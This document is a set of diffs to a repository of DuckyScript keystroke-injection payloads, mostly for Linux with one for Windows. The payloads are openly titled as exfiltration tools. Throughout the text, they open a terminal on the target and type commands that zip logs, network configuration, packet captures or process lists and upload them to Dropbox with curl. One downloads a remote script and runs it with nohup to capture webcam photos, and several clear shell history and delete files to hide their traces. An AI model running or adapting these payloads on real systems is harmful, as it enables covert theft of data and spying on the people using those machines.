||||||
DELAY 2000
|
DEFINE #TOKEN example
|
||||||
DEFINE TOKEN example
|
|
||||||
STRING ACCESS_TOKEN="
|
|
||||||
STRING TOKEN
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
|
REM Send to Dropbox function
|
||||||
|
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING USER_NAME=$(whoami)
|
STRINGLN USER_NAME=$(whoami)
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Create random num
|
REM Create random num
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Folder path
|
REM Folder path
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
|
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Zip path
|
REM Zip path
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING ZIP_NAME="$RANDOM.zip"
|
STRINGLN ZIP_NAME="$RANDOM.zip"
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
|
STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Default log path
|
REM Default log path
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING LOG_PATH="/var/log/"
|
STRINGLN LOG_PATH="/var/log/"
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
|
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Delay of zipping operation - it depends
|
REM Delay of zipping operation - it depends
|
||||||
DELAY 10000
|
DELAY 10000
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING DROPBOX_FOLDER="/$ZIP_NAME"
|
STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Send to Dropbox function
|
|
||||||
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING curl -X POST
|
STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
STRING DROPBOX_API_LINK
|
|
||||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Send timing - it depends
|
REM Send timing - it depends
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING rm -rf "$TMP_FOLDER_PATH"
|
STRINGLN rm -rf "$TMP_FOLDER_PATH"
|
||||||
ENTER
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
|
|
||||||
# Exfiltrate Network Configuration - Linux ✅
|
# Exfiltrate Network Configuration - Linux
|
||||||
|
|
||||||
A script used to exfiltrate the network configuration on a Linux machine.
|
A script used to exfiltrate the network configuration on a Linux machine.
|
||||||
|
|
||||||
|
|
|
@ -1,96 +1,101 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ##########################################################
|
##########################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exfiltrate Linux Network Configuration |
|
# Title : Exfiltrate Linux Network Configuration #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Exfiltration, Execution |
|
# Category : Exfiltration, Execution #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ##########################################################
|
##########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
REM - Dropbox Account
|
REM - Dropbox Account
|
||||||
REM - - DROPBOX_ACCESS_TOKEN
|
REM - - DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
REM Required: Set here your Dropbox access TOKEN
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
DEFINE TOKEN example
|
DEFINE #TOKEN example
|
||||||
STRING ACCESS_TOKEN="
|
|
||||||
STRING TOKEN
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM DELAY 500
|
REM Set yout Dropbox folder name
|
||||||
REM STRING USER_NAME=$(whoami)
|
DEFINE #DROPBOX_FOLDER_NAME example
|
||||||
REM ENTER
|
|
||||||
|
REM This is just a Dropbox const, don't edit
|
||||||
|
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
STRINGLN USER_NAME=$(whoami)
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING ZIP_NAME="$RANDOM.zip"
|
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
|
STRINGLN ZIP_NAME="$RANDOM.zip"
|
||||||
ENTER
|
DELAY 500
|
||||||
|
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
|
||||||
|
|
||||||
REM Folder path
|
REM Folder path
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
|
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
|
STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
|
STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
|
STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
REM Delay for zipping operation, it depends by computer power and folder directory
|
REM Delay for zipping operation, it depends by computer power and folder directory
|
||||||
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
|
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
|
||||||
DELAY 3000
|
DELAY 3000
|
||||||
|
|
||||||
|
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
|
||||||
REM Set yout Dropbox folder name
|
|
||||||
DEFINE DROPBOX_FOLDER_NAME example
|
|
||||||
STRING DROPBOX_FOLDER="/
|
|
||||||
ENTER
|
|
||||||
STRING DROPBOX_FOLDER_NAME
|
|
||||||
ENTER
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
|
||||||
STRING curl -X POST
|
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
STRING DROPBOX_API_CONST
|
|
||||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
STRING history -c
|
STRINGLN history -c
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING rm -rf "$TMP_FOLDER_PATH"
|
STRINGLN rm -rf "$TMP_FOLDER_PATH"
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING rm -rf "$ZIP_PATH"
|
STRINGLN rm -rf "$ZIP_PATH"; exit
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 500
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
|
@ -1,57 +1,76 @@
|
||||||
|
REM_BLOCK
|
||||||
REM #############################################
|
#############################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exfiltrate Network Traffic |
|
# Title : Exfiltrate Network Traffic #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Exfiltration |
|
# Category : Exfiltration #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM #############################################
|
#############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Permissions
|
REM - Permissions
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
|
||||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||||
DEFINE SUDO_PASS example
|
DEFINE #SUDO_PASS example
|
||||||
|
|
||||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||||
DEFINE SNIFFING example
|
DEFINE #SNIFFING example
|
||||||
|
|
||||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||||
DEFINE TOKEN example
|
DEFINE #TOKEN example
|
||||||
|
|
||||||
REM Just a Dropbox const
|
REM Just a Dropbox const
|
||||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
|
||||||
REM Output file path packets.pcap, remember to use pcap extension
|
REM Output file path packets.pcap, remember to use pcap extension
|
||||||
DEFINE FILE example.pcap
|
DEFINE #FILE example.pcap
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### PERMISSIONS SECTION ####
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
STRINGLN sudo su
|
STRINGLN sudo su
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRINGLN SUDO_PASS
|
STRINGLN #SUDO_PASS
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
REM #### Network Traffic SECTION ####
|
REM #### Network Traffic SECTION ####
|
||||||
|
STRINGLN FILE_PATH="#FILE"
|
||||||
|
|
||||||
STRING FILE_PATH="
|
|
||||||
STRING FILE
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING filter_expression="
|
STRINGLN filter_expression="#SNIFFING"
|
||||||
STRING SNIFFING
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
REM Network card name
|
REM Network card name
|
||||||
|
@ -71,28 +90,18 @@ DELAY 60000
|
||||||
REM Kill the process by PID
|
REM Kill the process by PID
|
||||||
STRINGLN kill $tcpdump_pid
|
STRINGLN kill $tcpdump_pid
|
||||||
|
|
||||||
|
|
||||||
REM #### Exfiltrate SECTION ####
|
REM #### Exfiltrate SECTION ####
|
||||||
REM You can use whatever you want, i use Dropbox
|
REM You can use whatever you want, i use Dropbox
|
||||||
|
|
||||||
STRING ACCESS_TOKEN="
|
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||||
STRING TOKEN
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING curl -X POST
|
STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||||
STRING DROPBOX_API_CONST
|
|
||||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
|
|
||||||
REM #### REMOVE TRACES ####
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
STRINGLN rm "$FILE_PATH"
|
STRINGLN rm "$FILE_PATH"
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ##################################################
|
##################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exfiltrate Photos Through Shell |
|
# Title : Exfiltrate Photos Through Shell #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Exfiltration |
|
# Category : Exfiltration #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ##################################################
|
##################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
|
||||||
REM - for add the -x permission to the script.sh downloaded
|
REM - for add the -x permission to the script.sh downloaded
|
||||||
|
|
||||||
REM REQUIRED - replace example.com with your script.sh link
|
REM REQUIRED - replace example.com with your script.sh link
|
||||||
DEFINE SCRIPT-SH-LINK example.com
|
DEFINE #SCRIPT-SH-LINK example.com
|
||||||
|
|
||||||
REM REQUIRED - sudo Password
|
REM REQUIRED - sudo Password
|
||||||
DEFINE SUDO-PSWD example
|
DEFINE #SUDO-PSWD example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### Permission ####
|
REM #### Permission ####
|
||||||
|
|
||||||
REM This section of sudo time depends by the computer power on which it runs.
|
REM This section of sudo time depends by the computer power on which it runs.
|
||||||
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
|
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
|
||||||
|
|
||||||
STRING sudo su
|
STRINGLN sudo su
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING SUDO-PSWD
|
STRINGLN #SUDO-PSWD
|
||||||
ENTER
|
|
||||||
REM DELAY Based On Computer Power
|
REM DELAY Based On Computer Power
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
|
|
||||||
REM If you want to install the dependency of fswebcam you should decommend it.
|
REM If you want to install the dependency of fswebcam you should decommend it.
|
||||||
REM STRING apt install fswebcam -y
|
REM STRINGLN apt install fswebcam -y
|
||||||
REM ENTER
|
|
||||||
REM DELAY Based On Internet Power
|
REM DELAY Based On Internet Power
|
||||||
REM DELAY 5000
|
REM DELAY 5000
|
||||||
|
|
||||||
|
|
||||||
REM #### Script ####
|
REM #### Script ####
|
||||||
|
STRINGLN curl #SCRIPT-SH-LINK > script.sh
|
||||||
|
|
||||||
STRING curl
|
|
||||||
STRING SCRIPT-SH-LINK
|
|
||||||
STRING > script.sh
|
|
||||||
ENTER
|
|
||||||
REM DELAY Based On Internet Power
|
REM DELAY Based On Internet Power
|
||||||
DELAY 4000
|
DELAY 4000
|
||||||
|
|
||||||
STRING chmod +x script.sh
|
STRINGLN chmod +x script.sh
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING nohup ./script.sh > /dev/null 2>&1 & exit
|
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
|
||||||
ENTER
|
|
|
@ -1,73 +1,79 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ##########################################
|
##########################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exfiltrate Process Info |
|
# Title : Exfiltrate Process Info #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Exfiltration |
|
# Category : Exfiltration #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ##########################################
|
##########################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
REM - Discord Webhook
|
REM - Discord Webhook
|
||||||
|
|
||||||
DELAY 1000
|
REM Set yout Dropbox folder name
|
||||||
|
DEFINE #DROPBOX_FOLDER_NAME example
|
||||||
|
|
||||||
|
REM This is just a Dropbox const, don't edit
|
||||||
|
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### GET PROCESS SECTION ####
|
REM #### GET PROCESS SECTION ####
|
||||||
|
STRINGLN ps aux > process.txt
|
||||||
|
|
||||||
STRING ps aux > process.txt
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
|
|
||||||
REM #### EXFILTRATE SECTION ####
|
REM #### EXFILTRATE SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM Required: Set here your Dropbox access TOKEN
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
DEFINE TOKEN example
|
DEFINE TOKEN example
|
||||||
STRING ACCESS_TOKEN="
|
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||||
STRING TOKEN
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING USER_NAME=$(whoami)
|
STRINGLN USER_NAME=$(whoami)
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING TXT_PATH="/home/$USER_NAME/process.txt"
|
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
REM Set yout Dropbox folder name
|
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
|
||||||
DEFINE DROPBOX_FOLDER_NAME example
|
|
||||||
STRING DROPBOX_FOLDER="/
|
|
||||||
STRING DROPBOX_FOLDER_NAME
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
|
||||||
STRING curl -X POST
|
|
||||||
STRING DROPBOX_API_CONST
|
|
||||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
|
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### REMOVE TRACES ####
|
REM #### REMOVE TRACES ####
|
||||||
|
STRINGLN history -c; exit
|
||||||
|
|
||||||
STRING history -c
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
|
@ -1,26 +1,66 @@
|
||||||
REM ##########################################
|
REM_BLOCK
|
||||||
REM # |
|
##########################################
|
||||||
REM # Title : Exfiltrate Process Info |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Exfiltrate Process Info #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ##########################################
|
# #
|
||||||
|
##########################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
REM - Dropbox Webhook
|
REM - Dropbox Webhook
|
||||||
|
|
||||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
|
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
|
||||||
DEFINE PAYLOAD example.com
|
DEFINE #PAYLOAD example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
